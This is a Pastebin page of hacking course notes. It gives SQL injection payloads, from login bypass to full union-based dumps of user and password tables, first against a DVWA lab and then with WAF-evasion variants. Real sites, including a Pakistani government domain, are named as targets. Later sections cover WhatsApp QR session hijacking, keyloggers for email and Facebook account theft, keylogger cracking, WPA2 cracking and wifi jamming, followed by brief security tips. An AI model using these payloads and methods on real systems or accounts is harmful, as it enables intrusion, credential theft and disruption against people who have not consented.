Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Day 2
- -----
- Web Application Hacking and Security
- ------------------------------------
- Website: Collecetion of pages is known as website.
- Types of Websites
- Static : A Website will have no database inside it hence user can see the content of the website but can not input anything from users's side.
- For Example: Pure HTML Site.
- Dynamic : These websites carry database with in hence it has lots of user interaction area's from where user eneters information/data which goes and save in the backend.
- For Example: facebook,google,twitter,ums etc
- OWASP TOP 10 Attacks
- O : Open
- W : web
- A : Application
- S : Security
- P : Project
- www.owasp.org
- SQL Injection
- -------------
- SQL : Structured Query Language
- DDL : Data Definition Lanaguage
- DML : Data Manupulation Lang.
- DCL : Data Control Lang.
- Attack 1: Authentication Bypass Attack
- --------------------------------------
- When a hacker tries to bypass the login panel of the website and gain access of the admin panel with all features through which he/she can manupulate the website content.
- Target : safesecurities.com.pk
- userid=osama admin
- password=bomb admin
- select * from userstable where userid='osama''or'1'='1 and password='bomb''or'1'='1
- 'or'1'='1
- Union Based Injection
- ---------------------
- DVWA
- D : Damn
- V : Vulnerable
- W : Web
- A : Application
- Download : www.dvwa.org
- Requirements
- ------------
- 1. XAMPP Server (To make your computer as server)
- X : Cross Platform
- A : Apache
- M : MY-SQL
- P : PHP
- P : Perl
- Download: apachefriends.org
- 2. DVWA :Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
- 3. Copy and paste downloaded files in c:/xampp/htdoc folder
- 127.0.0.1/dvwa
- username=admin
- password:password
- Step 1: Target
- http://192.168.235.174/dvwa/vulnerabilities/sqli/
- Step 2: Find any GET method in the URL of the website
- GET : www.gmail.com/php?id=10
- POST : www.gmail.com/id/
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
- Step 3: Check the exception handling
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
- Step 4: Total number of columns from the respective table where id is a column.
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
- Step 5: Dump the left 2 columns on the right hand side.
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
- Step 6: Get the database and version name
- Database->Tables->Columns->Data
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
- Step 7: Get the entire tables of the webiste from the database.
- Schema: Database ki MAA.
- Tables :information_schema.tables
- Columns:information_schema.columns
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
- Target Table Found : users
- Step 8 : Get the columns of the users table
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#
- Step 9 : Get the data from user and password columns
- http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select user,password from users--+&Submit=Submit#
- Bypassing Firewall aka Union Based Injection via Web Application Firewall techniques
- --------------------------------------------
- Target: multan.gov.pk
- Step 1: FInd GET method in the URL
- http://target.com/files.php?id=1
- Step 2: Check the exception hanlding
- http://target.com/files.php?id=1'
- Step 3: Count the total number of columns
- http://target.com/files.php?id=1 order by 3--+
- Step 4: Dump the columns on the right handside.
- http://target.com/files.php?id=1 union select 1,2--+
- Bypassing Technique 1:
- Upper Lower Case
- union select
- UnIoN sElEcT -> new payload
- http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+
- Bypassing Technique II:Inline Comments
- --------------------------------------
- Executable inline comments
- /*!UnIoN*/ /*!SeLeCt*/
- http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
- Bypassing technique 3: Version Based Inline Executable Comments
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+
- My-SQL
- 1.00.00 : 10000
- 2.00.00 :20000
- 3.00.00
- 4.00.00
- 5.00.00 : 50000
- STep 5: Get the database
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+
- Step 6: Get the tables of the database
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+
- Target Table : users
- Step 7: Get the columns
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+
- Step 8: Get the login and password
- http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from users--+
- Secure
- -------
- 1. Do not run waf with default security settings
- 2. Keep update on new blacklisted parameters for waf
- 3. Make sure you do the custom changes in the WAF as per attack you are getting
- 4. Never off the firewall interms of fast response expectation in traffic.
- 5. have good validation of received queries and inputs at server level also.
- Whatsapp Hacking Attack : QRLJACKING
- ------------------------------------
- Step 1: Download Kali Linux (2.99GB)
- kali.org
- How to Install and RUn : Watch: https://www.youtube.com/watch?v=3ycEhwrkKYU
- Step 2: Run and fill the username and password
- username: root
- password: toor
- Step 3: Download QRLjacking code from Github
- Open Terminal: git clone https://github.com/OWASP/QRLJacking.git
- Step 4: Open QRLframework folder
- Step 5: give permissions to qrljacker.py
- chmod +x qrljacker.py
- Step 6: Run it in terminal ./QrlJacker.py
- Step 7: Select Chat Application -> Whatsapp -> Select Port 1337
- Step 4: To make this fake whatsapp QR code LIVE on internet.
- Download a service AKA: ngrok
- https://ngrok.com/download
- Facebook | Email Hacking Methods
- --------------------------------
- Family Keylogger : http://www.spyarsenal.com/download.html
- How to Secure your Email Accounts
- ---------------------------------
- 1. Always use a pass phrase instead of a password.
- 2. Always use a robust password
- howsecureismypassword.net
- checkurcardhackedornot.com
- Card no Expiry Date and CVV : Check
- oncetherewasacrow
- 3. *&Ig3SimG&*
- 4. Active 2 Step Verification in your Gmail.
- 5. Facebook: Backupcodes
- 6. Always check ur login activites from Gmail to see any unauthorised access.
- Reverse Engineering | Cracking LIVE
- -----------------------------------
- Reverse Engineering
- Engineering : The goal of eng. is to build something.
- High Level : ENG : C C++ Java Python
- Middle Level : Assembly : .obj
- Low Level : Binary : .exe
- Requirements
- --------------
- 1. OllyDBG
- 2. Perfect Keylogger
- 3. Windows Platform
- Target : http://www.blazingtools.com/downloads.html
- Wifi Hacking
- -------------
- Wifi Hacking: Wifi Stands for wireless fidelity. It works on protocol 802.11a onwards. Goal is to provide a wireless connectivty between hosts for data and information transfer and establish a valid communication channel for the same.
- Types of KEY Security Encryptions
- ---------------------------------
- 1. WEP : 64bit
- 2. WPA : 128bit
- 3. WPA-2 PSK <--- Target 256 and above
- Problem : You cannot brute force the kEY.
- How to Crack then : Dictionary Based Attack
- Requirement
- -----------
- 1. Kali Linux 1.8 version (old)
- 2. airmon-ng : This application is a CLI based used to put your wifi device inot monitoring mode and check if its capable of proceeding with the attack.
- 3. airodump-ng : This application will help you to dump the air packets and identofy that how many wifi access points are there near by you so that you can select the target to test its security.
- 4.macchanger*: This helps you to spoof your wifi adpaters real identity with fake mac address in case you want to do anonymous security testing.
- 5. aircrack-ng : This application will help you to crack the key which you extracted while wifi hacking process and will help you to match with the dictionary and if found will show the key.
- rahul -->!@#$% --> Mobile
- Router:rahul->!@#$% <---- !@#$%---rahul
- Network Attacks : Exploitation
- ------------------------------
- Active Attack : This attack is mainly concerned with the device direct attack.Hence we get the IP of teh device and then attack on the IP directly, the main goal of this attack is either to gain access to that device or if failed then down the host.
- Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit wifi jammer
- *Requirement : websploit in Kali Linux
- Step 1: Open terminal and type websploit
- Step 2: To see the cli network attacks type show modules
- Source Tute:https://www.youtube.com/watch?v=I4OPAdE5yv8
- Source Article: http://www.hackingtutorials.org/metasploit-tutorials/websploit-wifi-jammer/
Add Comment
Please, Sign In to add comment